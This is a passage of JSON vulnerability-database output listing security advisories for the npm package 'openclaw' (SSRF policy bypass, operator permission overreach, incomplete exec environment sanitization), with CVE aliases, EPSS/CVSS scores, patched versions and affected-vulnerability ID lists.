                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41388",
                "GHSA-3pm9-5j7m-59vc"
            ],
            "risk_score": 3.0,
            "exploitability": "0.5",
            "weighted_severity": "5.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z7wa-tw2t-vqas"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90293?format=api",
            "vulnerability_id": "VCID-z8mj-pnbe-wqej",
            "summary": "OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation\n## Impact\n\nBrowser SSRF Policy Bypass via Interaction-Triggered Navigation.\n\nBrowser interactions could trigger navigations that bypassed the normal SSRF navigation checks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @ccreater222 and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41912",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10088",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10102",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10118",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41912"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41912",
                    "reference_id": "CVE-2026-41912",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41912"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vr5g-mmx7-h897",
                    "reference_id": "GHSA-vr5g-mmx7-h897",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vr5g-mmx7-h897"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41912",
                "GHSA-vr5g-mmx7-h897"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z8mj-pnbe-wqej"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89442?format=api",
            "vulnerability_id": "VCID-zac2-wjyt-27af",
            "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n## Summary\nGateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: A real bug in shipped code: operator.write can reach admin-class Talk Voice config persistence. It belongs to the same narrow authenticated persistence class, so its severity should be normalized below high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41379",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08343",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08336",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00028",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08354",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41379"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41379",
                    "reference_id": "CVE-2026-41379",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41379"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3q42-xmxv-9vfr",
                    "reference_id": "GHSA-3q42-xmxv-9vfr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3q42-xmxv-9vfr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41379",
                "GHSA-3q42-xmxv-9vfr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zac2-wjyt-27af"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90152?format=api",
            "vulnerability_id": "VCID-zb5t-hhkm-kfeh",
            "summary": "OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n## Summary\nHost exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41369",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17279",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1724",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17276",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41369"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98"
                },
                {
